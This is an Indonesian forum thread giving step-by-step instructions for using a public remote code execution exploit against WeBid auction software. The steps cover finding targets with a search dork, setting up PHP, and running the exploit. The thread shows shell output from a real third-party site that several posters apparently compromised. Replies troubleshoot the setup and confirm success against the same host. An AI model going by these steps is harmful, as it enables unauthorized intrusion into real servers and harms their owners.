> > > >

Thread Closed
WeBid remote exploit PHP shell
zee eichel Offline
IBTeam Server Sysadmn
269 - 2,291
#1
04-12-2012, 09:52 PM
Berbasis dari sin neeh

http://www.exploit-db.com/exploits/17487/

1. copy terus simpan dengan nama terserah php

2. cari vulnerability dengan dork "powered by WeBid"

3. install php5-curl
Code:
sudo apt-get install php5-curl

4. ganti tanda "#" dengan ";" pada /etc/php5/cli/conf.d/mcrypt.ini
Code:
# configuration for php MCrypt module
extension=mcrypt.so
ganti jadi
Code:
; configuration for php MCrypt module
extension=mcrypt.so

5. jalankan dengan php cli

root@eichel:~/Downloads# php 17487.php http://mcs-1.com/webid/

+----------------------------------------------------------------------+
| WeBid <= 1.0.2 (converter.php) Remote Code Execution Exploit by EgiX |
+----------------------------------------------------------------------+

webid-shell# id
uid=776(mcscom) gid=773(mcscom) groups=773(mcscom)

webid-shell# uname -a
Linux host104.kvchosting.com 2.6.18-374.3.1.el5.lve0.8.44 #1 SMP Mon Oct 3 18:27:54 EEST

selesai .. satu contoh saja itu .. contoh yang lain ya silahkan :p
hati - hati bagi teman2 yang menggunakan aplikasi itu ya ...

FOLLOW @DutaLinux
for more question and sharing about security and Opensource only
www.dutalinux.org
 
Website Find

ariefhikam$ Offline
Donatur
5 - 63
#2
04-12-2012, 09:55 PM
lah kok. wakakkakakak Smile
An Ordinary Indonesian.
 
Website Find

permana Offline
Share
13 - 253
#3
04-12-2012, 09:58 PM
IJin nyoba pak bro . . hehe . .
 
Find

Divha Offline

0 - 13
#4
04-12-2012, 10:11 PM
Code:
$ ls -la /etc/php5/conf.d/
total 48
drwxr-xr-x 2 root root 4096 2012-04-12 21:06 .
drwxr-xr-x 5 root root 4096 2011-05-10 14:40 ..
-rw-r--r-- 1 root root   54 2011-05-03 07:59 curl.ini
-rw-r--r-- 1 root root   57 2011-05-03 07:59 mysqli.ini
-rw-r--r-- 1 root root   56 2011-05-03 07:59 mysql.ini
-rw-r--r-- 1 root root   52 2011-05-03 07:59 pdo.ini
-rw-r--r-- 1 root root   60 2011-05-03 07:59 pdo_mysql.ini
-rw-r--r-- 1 root root   65 2011-05-03 07:59 pdo_pgsql.ini
-rw-r--r-- 1 root root   62 2011-05-03 07:59 pdo_sqlite.ini
-rw-r--r-- 1 root root   61 2011-05-03 07:59 pgsql.ini
-rw-r--r-- 1 root root   60 2011-05-03 07:59 sqlite3.ini
-rw-r--r-- 1 root root   58 2011-05-03 07:59 sqlite.ini

Ga ada mcrypt.ini , berarti apa nih yang di ubah .
xixixi , maklum om saya pengguna baru
(04-12-2012, 10:11 PM)Divha Wrote:
Code:
$ ls -la /etc/php5/conf.d/
total 48
drwxr-xr-x 2 root root 4096 2012-04-12 21:06 .
drwxr-xr-x 5 root root 4096 2011-05-10 14:40 ..
-rw-r--r-- 1 root root   54 2011-05-03 07:59 curl.ini
-rw-r--r-- 1 root root   57 2011-05-03 07:59 mysqli.ini
-rw-r--r-- 1 root root   56 2011-05-03 07:59 mysql.ini
-rw-r--r-- 1 root root   52 2011-05-03 07:59 pdo.ini
-rw-r--r-- 1 root root   60 2011-05-03 07:59 pdo_mysql.ini
-rw-r--r-- 1 root root   65 2011-05-03 07:59 pdo_pgsql.ini
-rw-r--r-- 1 root root   62 2011-05-03 07:59 pdo_sqlite.ini
-rw-r--r-- 1 root root   61 2011-05-03 07:59 pgsql.ini
-rw-r--r-- 1 root root   60 2011-05-03 07:59 sqlite3.ini
-rw-r--r-- 1 root root   58 2011-05-03 07:59 sqlite.ini

ehh , udah ding .
sory om . kalo perlu post nya diapus

Ga ada mcrypt.ini , berarti apa nih yang di ubah .
xixixi , maklum om saya pengguna baru

Code:
Follow @MafiaChoco
(This post was last modified: 04-12-2012, 10:19 PM by Divha.)  
Find

zee eichel Offline
IBTeam Server Sysadmn
269 - 2,291
#5
04-12-2012, 11:11 PM
root@eichel:/etc/php5/cli/conf.d# ls
curl.ini mcrypt.ini mysql.ini pdo_mysql.ini sqlite3.ini
gd.ini mysqli.ini pdo.ini pdo_sqlite.ini sqlite.ini
root@eichel:/etc/php5/cli/conf.d#

jadi bukan /etc/php5/conf.d ... tapi /etc/php5/cli/conf.d/
FOLLOW @DutaLinux
for more question and sharing about security and Opensource only
www.dutalinux.org
(This post was last modified: 04-12-2012, 11:12 PM by zee eichel.)  
Website Find

ekawithoutyou Away
just suramer
25 - 836
#6
04-13-2012, 12:46 AM
ga ketemu om file mcrypt.ini Tongue
wah ketemu ternyata ane blum install jadi bagi yang g ketemu silahkan install terlebih dahulu dengan cara apt-get install php5-mcrypt Tongue
Every Second, Every Minutes, Every Hours, Every Days Its Never End
(This post was last modified: 04-13-2012, 12:54 AM by ekawithoutyou.)  
Find

revzter$ Away
The Blue Sky
5 - 133
#7
04-13-2012, 12:54 AM
sama om gak ketemu Angry

emank mcrypt.ini buat apa ya...? Tongue

Code:
; configuration for php MCrypt module
extension=mcrypt.so

artinya apa om ...? Big Grin

--------------------------------------------------------------
aku gak edit itu tp bisa masuk om,

Code:
root@bt:~# php qw.php http://mcs-1.com/webid/

+----------------------------------------------------------------------+
| WeBid <= 1.0.2 (converter.php) Remote Code Execution Exploit by EgiX |
+----------------------------------------------------------------------+

webid-shell# id
uid=776(mcscom) gid=773(mcscom) groups=773(mcscom)

webid-shell#

<< Humanity | To Other
(This post was last modified: 04-13-2012, 12:58 AM by revzter.)  
Website Find

zee eichel Offline
IBTeam Server Sysadmn
269 - 2,291
#8
04-13-2012, 12:16 PM
ya itu memang tidak perlu jika tidak ada... karena kebetulan ane ada jadi ane kasi tau agar kalau bisa di edit dulu ...
FOLLOW @DutaLinux
for more question and sharing about security and Opensource only
www.dutalinux.org
 
Website Find

sundach40s Offline

1 - 10
#9
04-13-2012, 03:03 PM
(04-13-2012, 12:16 PM)zee eichel Wrote: ya itu memang tidak perlu jika tidak ada... karena kebetulan ane ada jadi ane kasi tau agar kalau bisa di edit dulu ...


ko keluar gini ya:

Code:
root@sundach40s:/home/dheanx# ; configuration for php MCrypt model extension=mcrypt.so
bash: syntax error near unexpected token `;'

Tak Pernah Lelah untuk terus Belajar


 
Find

THJC Offline
Linuxtivist
112 - 2,625
#10
04-13-2012, 05:42 PM
Owh, ternyata begitu toh Smile
Thanks!
Yang putih, yang seharusnya ber-aksi dan berbakat!
Linuxtivist blog
 
Website Find


Thread Closed



Users browsing this thread: 1 Guest(s)